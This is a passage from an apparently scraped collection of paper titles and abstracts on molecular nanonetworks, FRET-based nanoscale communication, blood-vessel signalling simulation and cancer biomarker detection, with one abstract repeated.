Numerical results are presented to evaluate the obtained analytical expressions as functions of realistic biological parameters. --- paper_title: Predictive, personalized, preventive, participatory (P4) cancer medicine paper_content: Medicine will move from a reactive to a proactive discipline over the next decade--a discipline that is predictive, personalized, preventive and participatory (P4). P4 medicine will be fueled by systems approaches to disease, emerging technologies and analytical tools. There will be two major challenges to achieving P4 medicine--technical and societal barriers--and the societal barriers will prove the most challenging. How do we bring patients, physicians and members of the health-care community into alignment with the enormous opportunities of P4 medicine? In part, this will be done by the creation of new types of strategic partnerships--between patients, large clinical centers, consortia of clinical centers and patient-advocate groups. For some clinical trials it will necessary to recruit very large numbers of patients--and one powerful approach to this challenge is the crowd-sourced recruitment of patients by bringing large clinical centers together with patient-advocate groups. --- paper_title: Exploratory Design in Medical Nanotechnology: A Mechanical Artificial Red Cell paper_content: Molecular manufacturing promises precise control of matter at the atomic and molecular level, allowing the construction of micron-scale machines comprised of nanometer-scale components. Medical nanomachines will be among the earliest applications. The artificial red blood cell or “respirocyte” proposed here is a bloodborne spherical 1-micron diamondoid 1000-atm pressure vessel with active pumping powered by endogenous serum glucose, able to deliver 236 times more oxygen to the tissues per unit volume than natural red cells and to manage carbonic acidity. An onboard nanocomputer and numerous chemical and pressure sensors enable complex device behaviors remotely reprogrammable by the physician via externally applied acoustic signals. --- paper_title: Molecular Communication and Networking: Opportunities and Challenges paper_content: The ability of engineered biological nanomachines to communicate with biological systems at the molecular level is anticipated to enable future applications such as monitoring the condition of a human body, regenerating biological tissues and organs, and interfacing artificial devices with neural systems. From the viewpoint of communication theory and engineering, molecular communication is proposed as a new paradigm for engineered biological nanomachines to communicate with the natural biological nanomachines which form a biological system. Distinct from the current telecommunication paradigm, molecular communication uses molecules as the carriers of information; sender biological nanomachines encode information on molecules and release the molecules in the environment, the molecules then propagate in the environment to receiver biological nanomachines, and the receiver biological nanomachines biochemically react with the molecules to decode information. Current molecular communication research is limited to small-scale networks of several biological nanomachines. Key challenges to bridge the gap between current research and practical applications include developing robust and scalable techniques to create a functional network from a large number of biological nanomachines. Developing networking mechanisms and communication protocols is anticipated to introduce new avenues into integrating engineered and natural biological nanomachines into a single networked system. In this paper, we present the state-of-the-art in the area of molecular communication by discussing its architecture, features, applications, design, engineering, and physical modeling. We then discuss challenges and opportunities in developing networking mechanisms and communication protocols to create a network from a large number of bio-nanomachines for future applications. --- paper_title: Circulating microRNA-101 as a potential biomarker for hepatitis B virus-related hepatocellular carcinoma paper_content: Circulating microRNAs (miRNAs) are emerging as promising biomarkers for cancer; however, the significance of circulating miRNAs in hepatitis B virus (HBV)-related hepatocellular carcinoma (HCC) remains largely unknown. Based on our prior observations that miRNA-101 (miR-101) is downregulated by HBV and induces epigenetic modification, we sought to test whether circulating miR-101 may serve as a potential biomarker for HCC. The expression of miR-101 in HCCs and serum was evaluated by real-time polymerase chain reaction. Tissue and serum miR-101 levels were assessed in samples from patients with HBV-related HCC and healthy controls. A potential correlation was also evaluated between miR-101 expression and the clinicopathological features and prognosis of HCC patients. miR-101 was downregulated in HBV-related HCC tissues compared with adjacent noncancerous tissues. Furthermore, the miR-101 levels in these tissues from HCC patients were significantly lower than those in tissues from control subjects. Notably, serum miR-101 levels were found to have an inverse correlation with tissue miR-101 expression levels. The expression of serum miR-101 in patients with HBV-related HCC was significantly higher than that in the healthy controls, and this increase correlated with hepatitis B surface antigen positivity, HBV DNA levels and tumor size. These results indicate that different factors govern the levels of miR-101 in the tissue and serum of HCC patients. Given the marked and consistent increase in serum miR-101 levels in HCC patients, circulating miR-101 may serve as a promising biochemical marker for monitoring the progression of tumor development in HBV-related HCC. --- paper_title: Unexpected gain of function for the scaffolding protein plectin due to mislocalization in pancreatic cancer paper_content: We recently demonstrated that plectin is a robust biomarker for pancreatic ductal adenocarcinoma (PDAC), one of the most aggressive malignancies. In normal physiology, plectin is an intracellular scaffolding protein, but we have demonstrated localization on the extracellular surface of PDAC cells. In this study, we confirmed cell surface localization. Interestingly, we found that plectin cell surface localization was attributable to its presence in exosomes secreted from PDAC cells, which is dependent on the expression of integrin β4, a protein known to interact with cytosolic plectin. Moreover, plectin expression was necessary for efficient exosome production and was required to sustain enhanced tumor growth in immunodeficient and in immunocompetent mice. It is now clear that this PDAC biomarker plays a role in PDAC, and further understanding of plectin’s contribution to PDAC could enable improved therapies. --- paper_title: Programmable probiotics for detection of cancer in urine paper_content: Rapid advances in the forward engineering of genetic circuitry in living cells has positioned synthetic biology as a potential means to solve numerous biomedical problems, including disease diagnosis and therapy. One challenge inexploitingsynthetic biologyfortranslationalapplicationsistoengineermicrobesthatarewelltoleratedbypatients and seamlessly integrate with existing clinical methods. We use the safe and widely used probiotic Escherichia coli Nissle 1917 to develop an orally administered diagnostic that can noninvasively indicate the presence of liver metastasis by producing easily detectable signals in urine. Our microbial diagnostic generated a high-contrast urine signal through selective expansion in liver metastases (10 6 -fold enrichment) and high expression of a lacZ reporter maintained by engineering a stable plasmid system. The lacZ reporter cleaves a substrate to produce a small molecule that can be detected in urine. E. coli Nissle 1917 robustly colonized tumor tissue in rodent models of liver metastasis after oral delivery but did not colonize healthy organs or fibrotic liver tissue. We saw no deleterious health effects on the mice for more than 12 months after oral delivery. Our results demonstrate that probiotics can be programmed to safely and selectively deliver synthetic gene circuits to diseased tissue microenvironments in vivo. --- paper_title: CD164 regulates the tumorigenesis of ovarian surface epithelial cells through the SDF-1α/CXCR4 axis paper_content: BackgroundCD164 (endolyn), a sialomucin, has been reported to play a role in the proliferation, adhesion, and differentiation of hematopoietic stem cells. The potential association of CD164 with tumorigenicity remains unclear.MethodsThe clinicopathological correlation of ovarian cancer with CD164 was assessed in a 97-patient tumor tissue microarray. Overexpression or silence CD164 was to analyze the effect of CD164 on the proliferation, colony formation and apoptosis via a mouse xenograft and western blotting analysis. The subcellular localization of CD164 was collected in the immunohistochemical and confocal analysis.ResultsOur data demonstrated that higher expression levels of CD164 were identified in malignant ovarian cancer cell lines, such as SKOV3 and HeyA8. The clinicopathological correlation analysis showed that the upregulation of CD164 protein was significantly associated with tumor grade and metastasis. The overexpression of CD164 in human ovarian epithelial surface cells promoted cellular proliferation and colony formation and suppressed apoptosis. These tumorigenicity effects of CD164 were reconfirmed in a mouse xenograft model. We also found that the overexpression of CD164 proteins increased the amounts of CXCR4 and SDF-1α and activated the SDF-1α/CXCR4 axis, inducing colony and sphere formation. Finally, we identified the subcellular localization of CD164 in the nucleus and cytosol and found that nuclear CD164 might be involved in the regulation of the activity of the CXCR4 promoter.ConclusionsOur findings suggest that the increased expression of CD164 is involved in ovarian cancer progression via the SDF-1α/CXCR4 axis, which promotes tumorigenicity. Thus, targeting CD164 may serve as a potential ovarian cancer biomarker, and targeting CD164 may serve as a therapeutic modality in the management of high-grade ovarian tumors. --- paper_title: Plasma Osteopontin Is a Useful Diagnostic Biomarker for Advanced Non-Small Cell Lung Cancer paper_content: Background ::: Osteopontin (OPN) and carbonic anhydrase IX (CAIX), which are expressed on the surface of tumor cells, are associated with hypoxia during tumor development and progression. However, the roles of these proteins in the plasma of patients with non-small cell lung cancer (NSCLC) are poorly understood. Herein, we hypothesized that plasma OPN and CAIX levels could be used as diagnostic and prognostic tumor markers in patients with NSCLC. --- paper_title: A Molecular Communication System in Blood Vessels for Tumor Detection paper_content: This paper shows a proposal of a biological nano-communication system established in a blood vessel, aiming to support the detection and treatment of tumors. This system could either be used for diagnostic purposes in the early stage of a disease or to check any relapse of a previous disease already treated. In our proposal, the tumor detection happens through revealing tumor biomarkers on the cell surface, such as the CD47 protein. This detection takes advantage of some recent proposal if implementing nanorobot transport systems through modified flagellated bacteria. When a biomarker is detected, a molecular communication system is used for distributing the information over a number of nano-machines. These machines have a size similar to the white blood cells, so that they can flow through the vessel at the speed of the largest particles. The transported information is detected extra-body, through the use of smart probes, which triggers a decision tree in order to estimate the nature of the tumor and its most likely location. --- paper_title: Apolipoprotein C-II is a potential serum biomarker as a prognostic factor of locally advanced cervical cancer after chemoradiation therapy. paper_content: PURPOSE ::: To determine pretreatment serum protein levels for generally applicable measurement to predict chemoradiation treatment outcomes in patients with locally advanced squamous cell cervical carcinoma (CC). ::: ::: ::: METHODS AND MATERIALS ::: In a screening study, measurements were conducted twice. At first, 6 serum samples from CC patients (3 with no evidence of disease [NED] and 3 with cancer-caused death [CD]) and 2 from healthy controls were tested. Next, 12 serum samples from different CC patients (8 NED, 4 CD) and 4 from healthy controls were examined. Subsequently, 28 different CC patients (18 NED, 10 CD) and 9 controls were analyzed in the validation study. Protein chips were treated with the sample sera, and the serum protein pattern was detected by surface-enhanced laser desorption and ionization-time-of-flight mass spectrometry (SELDI-TOF MS). Then, single MS-based peptide mass fingerprinting (PMF) and tandem MS (MS/MS)-based peptide/protein identification methods, were used to identify protein corresponding to the detected peak. And then, turbidimetric assay was used to measure the levels of a protein that indicated the best match with this peptide peak. ::: ::: ::: RESULTS ::: The same peak 8918 m/z was identified in both screening studies. Neither the screening study nor the validation study had significant differences in the appearance of this peak in the controls and NED. However, the intensity of the peak in CD was significantly lower than that of controls and NED in both pilot studies (P=.02, P=.04) and validation study (P=.01, P=.001). The protein indicated the best match with this peptide peak at 8918 m/z was identified as apolipoprotein C-II (ApoC-II) using PMF and MS/MS methods. Turbidimetric assay showed that the mean serum levels of ApoC-II tended to decrease in CD group when compared with NED group (P=.078). ::: ::: ::: CONCLUSION ::: ApoC-II could be used as a biomarker for detection in predicting and estimating the radiation treatment outcome of patients with CC. --- paper_title: Endovascular mobile sensor network for detecting circulating tumoral cells paper_content: This paper analyzes the communications and medical potentials arising from establishing nano-scale communications making use of the stent tubular structures in blood vessels. Most of stent implants (both bare metal and drug eluiting stents) happens in coronary arteries for supporting weak endothelial points and counteracting the obstructing effects of arthrosclerosis. Such structures have continuously inspired researchers for introducing additional functions to the mere mechanical sustain of vessels. After a review of the current literature, we propose an original use of stents for monitoring CD47 receptors bearing cells and provide effective diagnostic and prognostic information. We can also perform the detection of different cancer markers, and then integrate this information. These monitoring functions and the event notifications makes used of nano-scale communications. Through a well established simulator of biological nano-scale communications, we will gain significant insights about the establishment of these types of communications happening between different sections of the stent structure. The information exchanges is assumed to be collected by nano-sensors of tumor cells. The outcome of the research is the characterization of the channel transmission capabilities. When considering cost benefit of these expensive smart stents, we suggest a wider perspective where oncologists may join the team of future interventional cardiologists. Thus, our system creates a link between cancer detection, stent devices, and body area networks to P5 medicine. --- paper_title: Carcinoembryonic antigen (CEA) as tumor marker in lung cancer. paper_content: The use of CEA as a prognostic and predictive marker in patients with lung cancer is widely debated. The aim of this review was to evaluate the results from studies made on this subject. Using the search words "CEA", "tumor markers in lung cancer", "prognostic significance", "diagnostic significance" and "predictive significance", a search was carried out on PubMed. Exclusion criteria was articles never published in English, articles before 1981 and articles evaluating tumor markers in lung cancer not involving CEA. Initially 217 articles were found, and 34 were left after selecting those relevant for the present study. Four of these included both Non-Small Cell Lung Cancer (NSCLC) and Small Cell Lung Cancer (SCLC) patients, and 31 dealt solely with NSCLC patients. Regarding SCLC no studies showed that serum level of CEA was a prognostic marker for overall survival (OS). The use of CEA serum level as a prognostic marker in NSCLC was investigated in 23 studies and the use of CEA plasma level in two. In 18 (17 serum, 1 plasma) of these studies CEA was found to be a useful prognostic marker for either OS, recurrence after surgery or/and progression free survival (PFS) in NSCLC patients. Interestingly, an overweight of low stage (stage I-II) disease and adenocarcinoma (AC) patients were observed in this group. The remaining 7 studies (6 serum, 1 plasma) contained an overweight of patients with squamous carcinoma (SQ). One study found evidence for that a tumor marker index (TMI), based on preoperative CEA and CYFRA21-1 serum levels, is useful as a prognostic marker for OS in NSCLC. Six studies evaluated the use of CEA as a predictive marker for risk of recurrence and risk of death in NSCLC patients. Four of these studies found, that CEA was useful as a predictive marker for risk of recurrence and risk of death measured over time. No studies found CEA levels useful as a diagnostic marker for lung cancer. With regard to NSCLC the level of CEA measured in tumor tissue in NSCLC patients, were not of prognostic, diagnostic or predictive significance for OS or recurrence after treatment. In one study CEA level was measured in Pleural Lavage Fluid (PLF) it was here found to be useful as prognostic markers for overall survival (OS) after surgery. In conclusion serum level of CEA carries prognostic and predictive information of risk of recurrence and of death in NSCLC independent of treatment or study design. The observation that TMI index could be a potential prognostic marker for OS in NSCLC is interesting. Future studies may benefit from evaluating more than one marker at a time, which may possibly create a more precise index for prognosis and recurrence in lung cancer, than is possible by the use of single biomarkers. --- paper_title: Mobile Ad Hoc Nanonetworks with Collision-Based Molecular Communication paper_content: Recent developments in nanotechnology have enabled the fabrication of nanomachines with very limited sensing, computation, communication, and action capabilities. The network of communicating nanomachines is envisaged as nanonetworks that are designed to accomplish complex tasks such as drug delivery and health monitoring. For the realization of future nanonetworks, it is essential to develop novel and efficient communication and networking paradigms. In this paper, the first step toward designing a mobile ad hoc molecular nanonetwork (MAMNET) with electrochemical communication is taken. MAMNET consists of mobile nanomachines and infostations that share nanoscale information using electrochemical communication whenever they have a physical contact with each other. In MAMNET, the intermittent connectivity introduced by the mobility of nanomachines and infostations is a critical issue to be addressed. An analytical framework that incorporates the effect of mobility into the performance of electrochemical communication among nanomachines is presented. Using the analytical model, numerical analysis for the performance evaluation of MAMNET is obtained. Results reveal that MAMNET achieves adequately high throughput to enable frontier nanonetwork applications with acceptable communication latency. --- paper_title: New paradigm for tumor theranostic methodology using bacteria-based microrobot paper_content: We propose a bacteria-based microrobot (bacteriobot) based on a new fusion paradigm for theranostic activities against solid tumors. We develop a bacteriobot using the strong attachment of bacteria to Cy5.5-coated polystyrene microbeads due to the high-affinity interaction between biotin and streptavidin. The chemotactic responses of the bacteria and the bacteriobots to the concentration gradients of lysates or spheroids of solid tumors can be detected as the migration of the bacteria and/or the bacteriobots out of the central region toward the side regions in a chemotactic microfluidic chamber. The bacteriobots showed higher migration velocity toward tumor cell lysates or spheroids than toward normal cells. In addition, when only the bacteriobots were injected to the CT-26 tumor mouse model, Cy5.5 signal was detected from the tumor site of the mouse model. In-vitro and in-vivo tests verified that the bacteriobots had chemotactic motility and tumor targeting ability. The new microrobot paradigm in which bacteria act as microactuators and microsensors to deliver microstructures to tumors can be considered a new theranostic methodology for targeting and treating solid tumors. --- paper_title: Multi-input RNAi-based logic circuit for identification of specific cancer cells. paper_content: Engineered biological systems that integrate multi-input sensing, sophisticated information processing, and precisely regulated actuation in living cells could be useful in a variety of applications. For example, anticancer therapies could be engineered to detect and respond to complex cellular conditions in individual cells with high specificity. Here, we show a scalable transcriptional/posttranscriptional synthetic regulatory circuit--a cell-type "classifier"--that senses expression levels of a customizable set of endogenous microRNAs and triggers a cellular response only if the expression levels match a predetermined profile of interest. We demonstrate that a HeLa cancer cell classifier selectively identifies HeLa cells and triggers apoptosis without affecting non-HeLa cell types. This approach also provides a general platform for programmed responses to other complex cell states. --- paper_title: Selective glycoprotein detection through covalent templating and allosteric click-imprinting paper_content: Many glycoproteins are intimately linked to the onset and progression of numerous heritable or acquired diseases of humans, including cancer. Indeed the recognition of specific glycoproteins remains a significant challenge in analytical method and diagnostic development. Herein, a hierarchical bottom-up route exploiting reversible covalent interactions with boronic acids and so-called click chemistry for the fabrication of glycoprotein selective surfaces that surmount current antibody constraints is described. The self-assembled and imprinted surfaces, containing specific glycoprotein molecular recognition nanocavities, confer high binding affinities, nanomolar sensitivity, exceptional glycoprotein specificity and selectivity with as high as 30 fold selectivity for prostate specific antigen (PSA) over other glycoproteins. This synthetic, robust and highly selective recognition platform can be used in complex biological media and be recycled multiple times with no performance decrement. --- paper_title: Extracellular vesicles: biology and emerging therapeutic opportunities paper_content: Within the past decade, extracellular vesicles have emerged as important mediators of intercellular communication, being involved in the transmission of biological signals between cells in both prokaryotes and higher eukaryotes to regulate a diverse range of biological processes. In addition, pathophysiological roles for extracellular vesicles are beginning to be recognized in diseases including cancer, infectious diseases and neurodegenerative disorders, highlighting potential novel targets for therapeutic intervention. Moreover, both unmodified and engineered extracellular vesicles are likely to have applications in macromolecular drug delivery. Here, we review recent progress in understanding extracellular vesicle biology and the role of extracellular vesicles in disease, discuss emerging therapeutic opportunities and consider the associated challenges. --- paper_title: Nanonetworks: a new frontier in communications paper_content: Nanotechnology is enabling the development of devices in a scale ranging from one to a few one hundred nanometers. Nanonetworks, i.e., the interconnection of nano-scale devices, are expected to expand the capabilities of single nano-machines by allowing them to cooperate and share information. Traditional communication technologies are not directly suitable for nanonetworks mainly due to the size and power consumption of existing transmitters, receivers and additional processing components. All these define a new communication paradigm that demands novel solutions such as nano-transceivers, channel models for the nano-scale, and protocols and architectures for nanonetworks. In this talk, first the state-of-the-art in nano-machines, including architectural aspects, expected features of future nano-machines, and current developments are presented for a better understanding of the nanonetwork scenarios. Moreover, nanonetworks features and components are explained and compared with traditional communication networks. Novel nano-antennas based on nano-materials as well as the terahertz band are investigated for electromagnetic communication in nanonetworks. Furthermore, molecular communication mechanisms are presented for short-range networking based on ion signaling and molecular motors, for medium-range networking based on flagellated bacteria and nanorods, as well as for long-range networking based on pheromones and capillaries. Finally, open research challenges such as the development of network components, molecular communication theory, and new architectures and protocols, which need to be solved in order to pave the way for the development and deployment of nanonetworks within the next couple of decades are presented. --- paper_title: From P0 to P6 medicine, a model of highly participatory, narrative, interactive, and “augmented” medicine: some considerations on Salvatore Iaconesi’s clinical story paper_content: Salvatore Iaconesi was recently diagnosed with a brain tumor. He decided to share his clinical records not only with doctors but with everybody who wishes to find him a cure. “Because cure is not unique,” he emphasizes “there are cures for the body and cures for the soul, and everyone, from a painter to a musician, can find me a cure. Please, feel free to take my clinical history for example and let it become a game, a video, a music, a picture, whatever you like.” The emblematic hallmark of the changing times, Salvatore Iaconesi’s case is an example of how many profound revolutions and steps medicine has undertaken during the past few centuries. Stemming from a form of remote medical paternalism and arriving at the concept of a therapeutic alliance, medicine nowadays faces challenges and opportunities at a level before unforeseeable and unimaginable. The new concept of P6 medicine (personalized, predictive, preventive, participatory, psychocognitive, and public) is discussed, together with its profound implications. --- paper_title: Internalization of CD40 regulates its signal transduction in vascular endothelial cells paper_content: Abstract The CD40 ligand (CD40L)-CD40 dyad can ignite proinflammatory and procoagulatory activities of the vascular endothelium in the pathogenesis and progression of atherosclerosis. Besides being expressed on the activated CD4 + T cell surface (mCD40L), the majority of circulating CD40L reservoir (sCD40L) in plasma is released from stimulated platelets. It remains debatable which form of CD40L triggers endothelial inflammation. Here, we demonstrate that the agonistic antibody of CD40 (G28.5), which mimics the action of sCD40L, induces rapid endocytosis of CD40 independent of TRAF2/3/6 binding while CD40L expressed on the surface of HEK293A cells captures CD40 at the cell conjunction. Forced internalization of CD40 by constitutively active mutant of Rab5 preemptively activates NF-κB pathway, suggesting that CD40 was able to form an intracellular signal complex in the early endosomes. Internalized CD40 exhibits different patterns of TRAF2/3/6 recruitment and Akt phosphorylation from the membrane anchored CD40 complex. Finally, mCD40L but not sCD40L induces the upregulation of proinflammatory cytokines and cell adhesion factors in the primary human vascular endothelial cells in vitro, although both forms of CD40L activate NF-κB pathway. These results therefore may help understand the molecular mechanism of CD40L signaling that contributes to the pathophysiology of atherosclerosis. --- paper_title: Simulating an in vitro experiment on nanoscale communications by using BiNS2 paper_content: Abstract Nanoscale communications is an emergent research topic with potential applications in many fields. In order to design nanomachines able to exploit the communication potentials of nanoscale environments, it is necessary to identify the basic communication mechanisms and the relevant parameters. In this paper, we show how system parameters can be derived by suitably matching the results of in vitro experiments with those obtained via simulations by using the BiNS2 simulator. In order to scale the simulation from micrometric settings, with timescale in the order of seconds, to real experiments lasting tens of minutes with millimetric size, we enhanced the BiNS2 simulator by introducing a space partition algorithm based on the octree. In this way, the simulator can exploit the high level of parallelism of modern multicore computer architectures. We have used this technique for simulating an experiment focused on the communication between platelets and endothelium through the diffusion of nanoparticles. Simulation results match experimental data, thus allowing us to infer useful information on the receiver operation. --- paper_title: Simulation of Molecular Signaling in Blood Vessels: Software Design and Application to Atherogenesis paper_content: Abstract This paper presents a software platform, named BiNS2, able to simulate diffusion-based molecular communications with drift inside blood vessels. The contribution of the paper is twofold. First a detailed description of the simulator is given, under the software engineering point of view, by highlighting the innovations and optimizations introduced. Their introduction into the previous version of the BiNS simulator was needed to provide the functions for simulating molecular signaling and communication potentials inside bounded spaces. The second contribution consists of the analysis, carried out by using BiNS2, of a specific communication process happening inside blood vessels, the atherogenesis, which is the initial phase of the formation of atherosclerotic plaques, due to the abnormal signaling between platelets and endothelium. From a communication point of view, platelets act as mobile transmitters, endothelial cells are fixed receivers, sticky to the vessel walls, and the transmitted signal is made of bursts of molecules emitted by platelets. The simulator allows for the evaluation of the channel latency and the footprint on the vessel wall of the transmitted signal as a function of the transmitter distance from the vessels wall, the signal strength, and the receiver sensitivity. --- paper_title: Influence of Red Blood Cells on Nanoparticle Targeted Delivery in Microcirculation paper_content: Multifunctional nanomedicine holds considerable promise as the next generation of medicine that allows for targeted therapy with minimal toxicity. Most current studies on nanoparticle (NP) drug delivery consider a Newtonian fluid with suspending NPs. However, blood is a complex biological fluid composed of deformable cells, proteins, platelets, and plasma. For blood flow in capillaries, arterioles and venules, the particulate nature of the blood needs to be considered in the delivery process. The existence of the cell-free-layer and NP–cell interaction will largely influence both the dispersion and binding rates, thus impact targeted delivery efficacy. In this paper, a particle–cell hybrid model is developed to model NP transport, dispersion, and binding dynamics in blood suspension. The motion and deformation of red blood cells (RBCs) is captured through the Immersed Finite Element Method. The motion and adhesion of individual NPs are tracked through Brownian adhesion dynamics. A mapping algorithm and an interaction potential function are introduced to consider the cell–particle collision. NP dispersion and binding rates are derived from the developed model under various rheology conditions. The influence of red blood cells, vascular flow rate, and particle size on NP distribution and delivery efficacy is characterized. A non-uniform NP distribution profile with higher particle concentration near the vessel wall is observed. Such distribution leads to over 50% higher particle binding rate compared to the case without RBC considered. The tumbling motion of RBCs in the core region of the capillary is found to enhance NP dispersion, with dispersion rate increasing as shear rate increases. Results from this study contribute to the fundamental understanding and knowledge on how the particulate nature of blood influences NP delivery, which will provide mechanistic insights on the nanomedicine design for targeted drug delivery applications. --- paper_title: Modeling CD40-Based Molecular Communications in Blood Vessels paper_content: This paper presents a mathematical characterization of the main features of the molecular communication between platelets and endothelial cells via CD40 signaling during the initial phases of atherosclerosis, known also as atherogenesis. We demonstrate through laboratory experimentation that the release of soluble CD40L molecules from platelets in a fluid medium is enough to trigger expression of adhesion molecules on endothelial cell’s surface; that is, physical contact between the platelets and the endothelial cells is not necessary. We also propose the mathematical model of this communication, and we quantify the model parameters by matching the experiment results to the model. In addition, this mathematical model of platelet-endothelium interaction, along with propagation models typical of blood vessels, is incorporated into a simulation platform. Analysis of the simulation results indicates that these enhancements render the simulator a useful tool upon which to base discussion for planning research, and has the potential to be an important step in the understanding, diagnosis, and treatment of cardiovascular diseases. --- paper_title: Predictive, personalized, preventive, participatory (P4) cancer medicine paper_content: Medicine will move from a reactive to a proactive discipline over the next decade--a discipline that is predictive, personalized, preventive and participatory (P4). P4 medicine will be fueled by systems approaches to disease, emerging technologies and analytical tools. There will be two major challenges to achieving P4 medicine--technical and societal barriers--and the societal barriers will prove the most challenging. How do we bring patients, physicians and members of the health-care community into alignment with the enormous opportunities of P4 medicine? In part, this will be done by the creation of new types of strategic partnerships--between patients, large clinical centers, consortia of clinical centers and patient-advocate groups. For some clinical trials it will necessary to recruit very large numbers of patients--and one powerful approach to this challenge is the crowd-sourced recruitment of patients by bringing large clinical centers together with patient-advocate groups. --- paper_title: The Role of Platelets in Atherothrombosis paper_content: Platelets have evolved highly specialized adhesion mechanisms that enable cell-matrix and cell-cell interactions throughout the entire vasculature irrespective of the prevailing hemodynamic conditions. This unique property of platelets is critical for their ability to arrest bleeding and promote vessel repair. Platelet adhesion under conditions of high shear stress, as occurs in stenotic atherosclerotic arteries, is central to the development of arterial thrombosis; therefore, precise control of platelet adhesion must occur to maintain blood fluidity and to prevent thrombotic or hemorrhagic complications. Whereas the central role of platelets in hemostasis and thrombosis has long been recognized and well defined, there is now a major body of evidence supporting an important proinflammatory function for platelets that is linked to host defense and a variety of autoimmune and inflammatory diseases. In the context of the vasculature, experimental evidence indicates that the proinflammatory function of platelets can regulate various aspects of the atherosclerotic process, including its initiation and propagation. The mechanisms underlying the proatherogenic function of platelets are increasingly well defined and involve specific adhesive interactions between platelets and endothelial cells at atherosclerotic-prone sites, leading to the enhanced recruitment and activation of leukocytes. Through the release of chemokines, proinflammatory molecules, and other biological response modulators, the interaction among platelets, endothelial cells, and leukocytes establishes a localized inflammatory response that accelerates atherosclerosis. These inflammatory processes typically occur in regions of the vasculature experiencing low shear and perturbed blood flow, a permissive environment for leukocyte-platelet and leukocyte-endothelial interactions. Therefore, the concept has emerged that platelets are a central element of the atherothrombotic process and that future therapeutic strategies to combat this disease need to take into consideration both the prothrombotic and proinflammatory function of platelets. --- paper_title: Multi-Step FRET-Based Long-Range Nanoscale Communication Channel paper_content: Nanoscale communication based on Forster Resonance Energy Transfer (FRET) is a promising paradigm that allows future molecular-size machines to communicate with each other over distances up to 10 nm using the excited state energies of fluorescent molecules. In this study, we propose a novel nanoscale communication method based on multi-step FRET using identical fluorophores as relay nodes between communicating nanomachines, and utilizing multi-exciton transmission scheme in order to improve the limited range of the communication and achievable transmission rate over the nanoscale channel. We investigate two communication scenarios: immobile nanomachines communicating through a channel in a host material with linearly located relay nodes, and mobile nanomachines communicating through a channel in a 3-dimensional aqueous environment with randomly deployed relay nodes. We simulate the communication over these channels with realistic algorithms considering the high degree of randomness intrinsic to FRET phenomenon. Using the simulation results and following a Monte Carlo approach, we evaluate the performance of the channels by means of information theoretical capacity and interference probability. We show that multi-step FRET-based communication significantly outperforms the other biologically inspired nanocommunication techniques proposed so far in terms of maximum achievable data transmission rates. The results underline the compatibility and practicality of the FRET-based communication for several applications ranging from molecular computers to nanosensor networks. --- paper_title: Aptamers and Their Applications in Nanomedicine paper_content: Aptamers are composed of short RNA or single-stranded DNA sequences that, when folded into their unique 3D conformation, can bind to their targets with high specificity and affinity. Although functionally similar to protein antibodies, oligonucleotide aptamers offer several advantages over protein antibodies in biomedical and clinical applications. Through the enhanced permeability and retention effect, nanomedicines can improve the therapeutic index of a treatment and reduce side effects by enhancing accumulation at the disease site. However, this targets tumors passively and, thus, may not be ideal for targeted therapy. To construct ligand-directed "active targeting" nanobased delivery systems, aptamer-equipped nanomedicines have been tested for in vitro diagnosis, in vivo imaging, targeted cancer therapy, theranostic approaches, sub-cellular molecule detection, food safety, and environmental monitoring. This review focuses on the development of aptamer-conjugated nanomedicines and their application for in vivo imaging, targeted therapy, and theranostics. --- paper_title: QDs-DNA nanosensor for the detection of hepatitis B virus DNA and the single-base mutants. paper_content: We report here a quantum dots-DNA (QDs-DNA) nanosensor based on fluorescence resonance energy transfer (FRET) for the detection of the target DNA and single mismatch in hepatitis B virus (HBV) gene. The proposed one-pot DNA detection method is simple, rapid and efficient due to the elimination of the washing and separation steps. In this study, the water-soluble CdSe/ZnS QDs were prepared by replacing the trioctylphosphine oxide (TOPO) on the surface of QDs with 3-mercaptopropionic acid (MPA). Subsequently, oligonucleotides were attached to the QDs surface to form functional QDs-DNA conjugates. Along with the addition of DNA targets and Cy5-modified signal DNAs into the QDs-DNA conjugates, sandwiched hybrids were formed. The resulting assembly brings the Cy5 fluorophore, the acceptor, and the QDs, the donor, into proximity, leading to fluorescence emission from the acceptor by means of FRET on illumination of the donor. In order to efficiently detect single-base mutants in HBV gene, oligonucleotide ligation assay was employed. If there existed a single-base mismatch, which could be recognized by the ligase, the detection probe was not ligated and no Cy5 emission was produced due to the lack of FRET. The feasibility of the proposed method was also demonstrated in the detection of synthetic 30-mer oliginucleotide targets derived from the HBV with a sensitivity of 4.0nM by using a multilabel counter. The method enables a simple and efficient detection that could be potentially used for high throughput and multiplex detections of target DNA and the mutants. --- paper_title: A Communication Theoretical Analysis of FRET-Based Mobile Ad Hoc Molecular Nanonetworks paper_content: Nanonetworks refer to a group of nanosized machines with very basic operational capabilities communicating to each other in order to accomplish more complex tasks such as in-body drug delivery, or chemical defense. Realizing reliable and high-rate communication between these nanomachines is a fundamental problem for the practicality of these nanonetworks. Recently, we have proposed a molecular communication method based on Forster Resonance Energy Transfer (FRET) which is a nonradiative excited state energy transfer phenomenon observed among fluorescent molecules, i.e., fluorophores. We have modeled the FRET-based communication channel considering the fluorophores as single-molecular immobile nanomachines, and shown its reliability at high rates, and practicality at the current stage of nanotechnology. In this study, for the first time in the literature, we investigate the network of mobile nanomachines communicating through FRET. We introduce two novel mobile molecular nanonetworks: FRET-based mobile molecular sensor/actor nanonetwork (FRET-MSAN) which is a distributed system of mobile fluorophores acting as sensor or actor node; and FRET-based mobile ad hoc molecular nanonetwork (FRET-MAMNET) which consists of fluorophore-based nanotransmitter, nanoreceivers and nanorelays. We model the single message propagation based on birth-death processes with continuous time Markov chains. We evaluate the performance of FRET-MSAN and FRET-MAMNET in terms of successful transmission probability and mean extinction time of the messages, system throughput, channel capacity and achievable communication rates. --- paper_title: A Physical Channel Model and Analysis for Nanoscale Molecular Communications With Förster Resonance Energy Transfer (FRET) paper_content: In this study, a novel and physically realizable nanoscale communication paradigm is introduced based on a well-known phenomenon, Forster resonance energy transfer (FRET), for the first time in the literature. FRET is a nonradiative energy transfer process between fluorescent molecules based on the dipole-dipole interactions of molecules. Energy is transferred rapidly from a donor to an acceptor molecule in a close proximity such as 0 to 10 nm without radiation of a photon. Low dependence on the environmental factors, controllability of its parameters, and relatively wide transfer range make FRET a promising candidate to be used for a high-rate nanoscale communication channel. In this paper, the simplest form of the FRET-based molecular communication channel comprising a single transmitter-receiver nanomachine pair and an extended version of this channel with a relay nanomachine for long-range applications are modeled considering nanomachines as nanoscale electromechanical devices with some sensing, computing, and actuating capabilities. Furthermore, using the information theoretical approach, the capacities of these communication channels are investigated and the dependence of the capacity on some environmental and intrinsic parameters is 